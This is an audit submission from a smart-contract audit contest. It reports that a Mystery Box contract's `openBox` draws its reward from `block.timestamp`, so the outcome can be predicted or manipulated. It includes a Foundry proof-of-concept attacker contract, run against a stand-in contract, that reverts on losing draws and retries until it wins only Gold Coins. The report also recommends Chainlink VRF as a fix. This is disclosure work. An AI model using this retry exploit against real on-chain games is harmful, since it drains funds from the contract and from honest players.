Mystery Box

First Flight #25
Beginner Friendly, Foundry
100 EXP
Submission Details
Severity: medium
Valid

Users can manipulate `randomValue` in function `openBox` through weak randomness

Summary

`openBox` derives `randomValue` from `block.timestamp` reduced modulo the number of outcomes. The timestamp can be nudged by the block producer within the tolerance other nodes accept, and it is readable by every caller at the moment the transaction executes, so it must not be used as a source of randomness.

Vulnerability Details

Using `block.timestamp` as a source of randomness is widely advised against: the value is public on-chain when `openBox` runs, so the result of the draw is predictable rather than random. No part of the contract needs to be compromised. An attacker can wrap `openBox` in a contract of their own that recomputes `randomValue` from the current timestamp, reverts when the result is not the reward they want, and retries in later blocks until the selection of the coin is favourable to them.

A block producer has an even easier time. Suppose Tom is a miner. Tom calls `openBox` and chooses in which block, and with which timestamp, his transaction lands, picking the combination whose `randomValue` maps to a Gold Coin. As a result, Tom can collect Gold Coins at will and abuse the contract.
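The retry attack described above, as an added Foundry proof of concept. This is example code written for this write-up, not the project's contract or test suite: `MysteryBoxSim` is an assumed stand-in that keeps only a 0.1 ETH box price and a draw of `keccak256(block.timestamp, msg.sender) % 100` with 99 as the Gold Coin; the real contract's reward table and price constants are not reproduced here.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Stand-in for the audited contract (an assumption for this example, not the
// project's own code): a box price and a reward draw that reduces a hash of
// block.timestamp modulo 100, with 99 assumed to be the Gold Coin.
contract MysteryBoxSim {
    uint256 public constant BOX_PRICE = 0.1 ether;
    mapping(address => uint256) public boxesOwned;
    mapping(address => string[]) public rewardsOwned;

    function buyBox() external payable {
        require(msg.value == BOX_PRICE, "wrong price");
        boxesOwned[msg.sender] += 1;
    }

    function openBox() external {
        require(boxesOwned[msg.sender] > 0, "no boxes to open");
        // Weak randomness: both inputs are known to the caller before the call.
        uint256 randomValue =
            uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 100;
        boxesOwned[msg.sender] -= 1;
        if (randomValue == 99) {
            rewardsOwned[msg.sender].push("Gold Coin");
        } else {
            rewardsOwned[msg.sender].push("Coal");
        }
    }

    function rewardCount(address user) external view returns (uint256) {
        return rewardsOwned[user].length;
    }
}

// Attacker contract: recomputes the draw for its own address and only pays for
// and opens a box in a transaction whose timestamp yields Gold. Every other
// attempt reverts, so the attacker never pays for a losing draw.
contract GoldOnly {
    MysteryBoxSim public immutable box;

    constructor(MysteryBoxSim _box) {
        box = _box;
    }

    function predict() public view returns (uint256) {
        return uint256(keccak256(abi.encodePacked(block.timestamp, address(this)))) % 100;
    }

    function buyAndOpenIfGold() external {
        require(predict() == 99, "not gold, retry in another block");
        box.buyBox{value: box.BOX_PRICE()}();
        box.openBox();
    }
}

contract WeakRandomnessTest is Test {
    function testAttackerOnlyEverWinsGold() public {
        MysteryBoxSim box = new MysteryBoxSim();
        GoldOnly atk = new GoldOnly(box);
        vm.deal(address(atk), 1 ether);

        // Step through consecutive block timestamps the way an attacker re-submits
        // the transaction (or a block producer picks a timestamp) until three boxes
        // have paid out. The bound keeps the loop finite; at 1% per draw it is ample.
        uint256 wins;
        uint256 start = 1_700_000_000; // arbitrary constructed starting timestamp
        for (uint256 i = 0; i < 5_000 && wins < 3; i++) {
            vm.warp(start + i);
            try atk.buyAndOpenIfGold() {
                wins++;
            } catch {}
        }

        assertEq(wins, 3);
        assertEq(box.rewardCount(address(atk)), 3);
        for (uint256 j = 0; j < 3; j++) {
            assertEq(box.rewardsOwned(address(atk), j), "Gold Coin");
        }
        // Three boxes bought at 0.1 ETH each, every one of them a Gold Coin.
        assertEq(address(atk).balance, 0.7 ether);
    }
}
```

Run it with `forge test --match-test testAttackerOnlyEverWinsGold`. The point of the `try`/`catch` loop is that a losing draw never costs the attacker anything: the revert in `buyAndOpenIfGold` happens before `buyBox` is called, so only the gas of the failed attempt is spent, and the attacker's reward list contains nothing but Gold Coins.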

Impact

Any user, and a block producer most easily, can turn the box draw into a guaranteed win by opening boxes only when `randomValue` is known in advance to map to the top reward. The expected payout of the game is then no longer bounded by the advertised probabilities.

Tom buys a Box for 0.1 ETH and wins the highest reward, a Gold Coin worth 1 ETH, for a profit of 0.9 ETH (1 - 0.1). Nothing stops him from repeating this for every box he buys, so the loss to the contract and to honest players scales with the number of boxes he is willing to fund.

Tools Used

Manual review.

Recommendations

Do not use `block.timestamp`, or any other value the caller or block producer can read or influence (`block.number`, `blockhash`, `msg.sender`, `prevrandao`), as a source of randomness. Use a verifiable randomness oracle such as Chainlink VRF, where the random word is requested in one transaction and delivered in a later one together with a proof that the contract checks, so neither the player nor the block producer can preview or retry the draw.

Updates

Appeal created

inallhonesty Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Randomness
